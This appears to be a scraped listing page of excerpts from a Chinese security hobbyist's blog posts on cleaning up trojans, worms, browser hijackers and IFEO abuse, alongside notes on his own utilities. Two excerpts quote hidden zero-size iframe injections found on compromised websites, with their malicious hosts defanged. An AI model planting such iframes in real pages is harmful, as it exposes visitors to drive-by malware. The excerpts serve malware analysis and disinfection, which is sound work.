某市長運運輸集團有限公司網站被掛馬Trojan.PSW.JHOnline.fcd等

endurer 原創2007-02-12 第1版該網站首頁首部被加入代碼:/--------<iframe src=hxxp://g***m**06.z**kd**520.cn/k**k*k/wm.htm   width=0 height=0></iframe><iframe src=hxxp://www.y*x***gm***7*8.com/mh/mh.htm width=0 height=0></iframe><iframe

輸入密碼登入系統後又自動登出?原來是機器狗惹的禍1

輸入密碼登入系統後又自動登出?原來是機器狗惹的禍1endurer 原創2008-02-15 第1版  一位網友因為好奇而開啟了有激情照的網頁串連,不幸中標。在用瑞星查殺病毒後就出現了問題:輸入帳戶密碼登入系統後又自動登出。引起這種情況的原因一般是Windows系統檔案userinit.exe出的問題。  用Windows XP的安裝光碟片啟動,選擇修復主控台,用命令dir

anymie360.exe,anymie360.dll,b770ca2.sys,Beep.sys,msiffei.sys等2

anymie360.exe,anymie360.dll,b770ca2.sys,Beep.sys,msiffei.sys等2 endurer 原創2009-02-09 第1版  (續1) 從pe_xscan的log中,我們可以看到:這個病毒使用了映像劫持技術阻止殺毒軟體、工作管理員等程式的啟動替換了beep.sys,將系統c:/windows/system32/rpcss.dll 改名為

無法使用工作管理員的解決方案

無法使用工作管理員的解決方案                                                                            1.檢查 c:/windows/system32 或 c:/winnt/system32 下是否有名為taskmgr.exe的檔案如果沒有,請從其它使用同一版本Windows的電腦中複製一個過來 2.用 c:/windows/system32/SIGVERIF.EXE 或

兩種方法刪除IE7瀏覽歷程記錄

兩種方法刪除IE7瀏覽歷程記錄  我們在上網的時候,一般會在機器上留下瀏覽記錄等一些涉及個人隱私的敏感資訊,存在安全隱患。與 IE6 相比,IE 7在清除這些敏感資訊、保護我們的個人隱私方面,做了改進和提高。下面就向大家介紹兩種刪除IE7瀏覽記錄的方法。  方法一:使用IE7的功能表命令。  開啟IE7,選擇功能表命令:工具→刪除瀏覽的記錄,然後點擊彈出的“刪除瀏覽的記錄”對話方塊中的“全部刪除”按鈕。  方法二:使用命令列命令。  開啟命令提示字元,按需要輸入下列命令並斷行符號:  RunDl

解決www.54kk.com/baidu劫持瀏覽器的問題

  endurer 原創 2005.10.27第一版  *endurer註:為了安全起見,下文中的“http://”均用“hxxp://”代替。  剛才一位同事的電腦中的瀏覽器被惡意網站劫持了,請我幫忙處理。  同事的電腦使用的是:Windows ME (Win9x 4.90.3000) + IE 6.00 SP1

遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exe

遭遇使用映像劫持/IFEO 的 Worm.Win32.Avkiller.i/gavuusg.exeendurer 原創2007-07-21 第1版  中午時一位網友說他的電腦中的金山毒霸和網鏢無法啟動,估計是中標了,讓偶通過QQ遠程協助。  下載 pe_xscan,掃描log並分析,發現如下可疑項:/===pe_xscan 07-06-23 by Purple Endurer2007-7-21 12:52:28Windows XP Service Pack 2(5.1.2600)管理使用者組C:

一個利用real,聯眾遊戲程式漏洞,MS06-014傳播機器狗/fa.exe的網站

一個利用real,聯眾遊戲程式漏洞,MS06-014傳播機器狗/fa.exe的網站endurer 原創2008-02-13 第1版一位網友反映說他所管理的網站出了問題,開啟任一網頁,殺毒軟體就報病毒。檢查該網站的網代碼,發現:/---<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></iframe>---/1 hxxp://xxx.hu*i**la**ib*a*.info/104.htm包含代碼:/--

查看&備份 系統開/關機 & 使用者登入/登出 記錄——BootClos 0_0_0001_beta2

  一、0_0_0001_beta2的主要改進:  1、增加 使用者登入/登出 記錄的 查看&備份  2、開機、關機、 使用者登入、使用者登出記錄分別用不同的顏色來顯示  3、改進了建立備份記錄檔案的代碼   註:  如果查看不到 使用者登入/登出 記錄,請按下列步驟操作:  (1)開啟組策略編輯器。方法為:開始——運行——輸入:gpedit.msc——確定。  (2)在組策略編輯器視窗左面板展開:電腦配置/Windows

關於不定期彈出http://u.9kuku.com/的問題

endurer 原創2006-07-07 第1版有網友反映說,他的電腦在上網的時候,總是不定時的開啟網頁:hxxp://u.9kuku.com/html/bd16/index.html,並發來了HijackThis的掃描的簡明log。修複建議:先開啟控制台裡的添加刪除程式,把雅虎助手、比較購物搜尋之類的東東都卸載了重啟到安全模式下如果使用了系統還原功能, 請先關閉此功能。設定系統顯示所有檔案和檔案夾,不隱藏已知檔案類型副檔名找到下面的檔案:C:/WINDOWS/system32/netsend.

打造網頁中的樹型菜單

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>TreeMenu</TITLE><META NAME="Generator" CONTENT="EditPlus"><!--2006-04-28 改進,使用定位字元2006-04-27 建立//--><META NAME="Author"

傳播維金/Viking蠕蟲的QQ尾巴變花樣了

endurer 原創2006-09-03 第1版小心通過QQ尾巴中的網址(Q-Zone.****qq.C0M)傳播的Worm.Win32.Viking.r

遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等2

遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等2endurer 原創2008-05-21 第1版(續:遭遇 Trojan-PSW.Win32.QQPass,Trojan.PSW.Win32.GameOL等1)到 http://purpleendurer.ys168.com 下載 FileInfo 和 bat_do,用FileInfo 提取 pe_xscan 的 log 中紅色標記的檔案的資訊,用 bat_do 打包備份,延時刪除。同時下載

[07-04] 用MASM32編寫全屏視窗程序

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; 檔案名稱: FullScr.asm; 作  者:Purple Endurer(purpleendure

遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1

遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1endurer 原創2008-03-19 第1版一位網友今天說他的電腦中了QQ盜號木馬,按QQ醫生的提示重啟電腦也不能解決,請偶幫忙清理。下載 pe_xscan 掃描 log 並分析,發現如下可疑項(進程模組中重複的部分有省略):/===pe_xscan 08-03-03 by Purple Endurer 2008-3-19 12:15:

用MASM32寫的 HttpRead 0.0.0001 beta2

用MASM32寫的 HttpRead 0.0.0001 beta2  從6.0 SP2開始,IE 不再支援view-source:協議,雖然 FireFox支援該協議,但為此而安裝 FireFox又實在是小題大作……  於是就有HttpRead:http://download.csdn.net/source/358215主要改進:1、使用wininet中的API來讀取。而

發現panda(熊貓)對W32.Looked.I處理得不錯

endurer 原創2006-10-20 第1版有位網友的電腦,裝有賽門鐵克的諾頓,每天都在報告發現W32.Looked.I,已清除。在帶網路連接的安全模式下遠程協助,相繼用諾頓、Dr.WebCureIt和瑞星線上免費掃描,一個病毒也沒發現,賽門鐵克病毒報告中提及的幾個檔案,一個也沒有找到。但回到一般模式又報告。第二天在正常模式下,把諾頓即時監控禁用,用panda(熊貓)線上免費殺毒掃描,發現了50多個感染 W32.Viking.E

檔案批處理器bat_do V0.0.0003 beta2 說明與下載

  當我們用HijackThis、pe_xscan等系統分析軟體發現可疑檔案,或者發現病毒檔案時,要把這些位於不同檔案夾的可疑檔案和病毒檔案分別設定密碼壓縮打包,即使是寫一個BAT檔案也比較麻煩!現在好了,用“檔案批處理器 / bat_do”可以方便地為我們完成這些工作!0、目錄===========1、程式基本資料2、版本更新記錄3、程式介面4、開發緣由5、聲明6、使用說明7、8、聯絡作者1、程式基本資料===========作  者:紫郢劍俠|Purple Endurer開發環境:MASM3

輸入密碼登入系統後又自動登出?原來是機器狗惹的禍2

輸入密碼登入系統後又自動登出?原來是機器狗惹的禍2endurer 原創2008-02-17 第1版(續輸入密碼登入系統後又自動登出?原來是機器狗惹的禍1 http://blog.csdn.net/Purpleendurer/archive/2008/02/15/2097467.aspx)運行瑞星卡卡安全助手,自動掃描出2個流氓軟體,清除了。在[進階功能]—>[外掛程式管理及卸載]裡,把O2 和O24 項卸載掉在[進階功能]—>[系統啟用項管理]裡,在左邊點擊[登入項],在右邊找到 O4

偶遇ARJ,釋放DOS時代記憶~

偶遇ARJ,釋放DOS時代記憶~Purple Endurer 原創2008-02-14 第1版  在幫一位同事裝業務軟體時,很驚奇地發現一些資料檔案名的副檔名是ARJ,這可是用ARJ軟體壓縮的呀~想不到在Vista時代還能遇到ARJ……  從DOS時代開始玩電腦的應該沒有人會不知道ARJ這個軟體罷?有興趣的朋友可以看看:ARJ Software,

總頁數: 61357 1 .... 15070 15071 15072 15073 15074 .... 61357 Go to: 前往

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.